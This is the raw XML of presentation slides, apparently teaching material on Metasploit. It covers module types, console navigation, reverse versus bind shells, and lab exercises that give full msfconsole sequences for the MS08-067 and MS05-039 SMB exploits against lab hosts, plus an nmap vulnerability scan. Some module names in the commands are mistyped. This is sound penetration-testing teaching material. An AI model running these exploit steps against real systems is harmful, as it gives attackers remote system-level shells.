              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Move files to a target machine </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Take files from a target machine </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sniff packets at the target </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reconfigure the target machine </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install  software  on  a  target  machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1162028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Auxiliary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Auxiliary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>modules perform all kinds of tasks m, including scanning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69061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Tour </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>of Metasploit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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>at Metasploit from within its console interface or from the file system of the machine running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metasploite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To look around inside the Metasploit console, you could run:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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root@bt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:/#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cd /opt/framework3/msf3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/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600" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@bt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:/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opt/framework/msf3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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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root@bt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:/opt/framework/msf3#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ls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872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Look inside MSF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Components</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>file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+mj-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Look inside of /opt/framework3/msf3/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mj-lt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133600"/>
            <a:ext cx="8686800" cy="473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0119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JOY OF EXPLOTTAION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Exploitation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is the pinnacle of many security professionals’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>careers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596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Basic Exploitation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from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>  show</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> will display every module available in the Framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; show exploits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i="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; show auxiliary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i="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; show options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You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can also issue the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>back</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command to go back once inside a module.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; use windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/ms08_067_netapi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i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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i="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exploit(ms08_067_netapi) &gt; back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i="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &gt;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303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Basic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Exploitation…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lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0"/>
              <a:t>The search command is useful for finding a specific attack, auxiliary module, or payload.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0"/>
              <a:t> For example, if you want to launch an attack against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0"/>
              <a:t> you could search for SQL like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &gt; search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> or specifically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8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8000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; search ms08_067</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0"/>
              <a:t>Then, having found an exploit you could load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
              <a:t>it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0"/>
              <a:t>with the use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
              <a:t>command,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8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8000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/ms08_067_netapi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8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8000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8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8000" dirty="0"/>
              <a:t>exploit(ms08_067_netapi) &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0"/>
              <a:t>Now, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
              <a:t>enter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0"/>
              <a:t>show options to display the options </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0"/>
              <a:t>the MS08-067 exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" i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8000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> exploit(ms08_067_netapi)&gt; show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> exploit(ms08_067_netapi)&gt; show payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8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8000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exploit(ms08_067_netapi)&gt; set payload windows/shell/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000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sz="8000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>payload =&gt; windows/shell/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="8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8000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> exploit(ms08_067_netapi)&gt;show options</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="360208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Reverse vs. Bind Shell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A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>reverse shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a payload that creates a connection from the target machine back to the attacker as a Windows command prompt, whereas a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>bind shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a payload that “binds” a command prompt to a listening port on the target machine, which the attacker can then connect. “binds” a command prompt to a listening port on the target machine, which the attacker can then connect.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="127015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Exercise Metasploit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We will use the windows Plug-n-play exploit against a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>target Vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>patched with  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MS08-067 Exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>gives attackers local System privilege </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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nmap -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-A --script=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smb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-check-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vulns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10.144.30.40,48,119,207</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; search –t exploit –r great </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smb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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; search MS08_067_netapi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; use exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/ms08_067 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netapi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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit (ms08_067_netapi)&gt; show payloads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391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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit (ms08_067_netapi)&gt; set PAYLOAD windows/shell/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bind_tcp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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit (ms08_067_netapi)&gt; show option</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit (ms08_067_netapi)&gt; set RHOST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>10.144.30.48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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit (ms08_067_netapi)&gt; set LPORT 5555</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit (ms08_067_netapi)&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit (ms08_067_netapi)&gt; session –l</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit (ms08_067_netapi)&gt; session –I ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit (ms08_067_netapi)&gt; exit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386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8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Exercise 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/>
              <a:t>We will use the windows Plug-n-play exploit against a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>target Vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>patched with  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>MS05-039</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>gives attackers local System privilege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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; search MS05_039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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt; use exploits/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/ms05_039_pnp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exploit(ms08_039_pnp)&gt; show payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit(ms08_039_pnp)&gt;set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PAYLOAD  windows/shell/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bin_tcp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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit(ms08_039_pnp)&gt; show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit(ms08_039_pnp)&gt; set RHOST 10.144.30</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit(ms08_039_pnp)&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> LPORT 5555</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exploit(ms08_039_pnp)&gt; exploit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058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Why </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Exploitation?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400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False </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>positive reduction /elimination</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But, even if exploit doesn't work, you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still may </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>want to report on detected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Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proof of vulnerability and therefore </a:t>
            </a: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     more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>realistic treatment of risk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use of one machine as a pivot point to get deeper inside the network</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More of a sense of what a real bad guy can accomplish</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
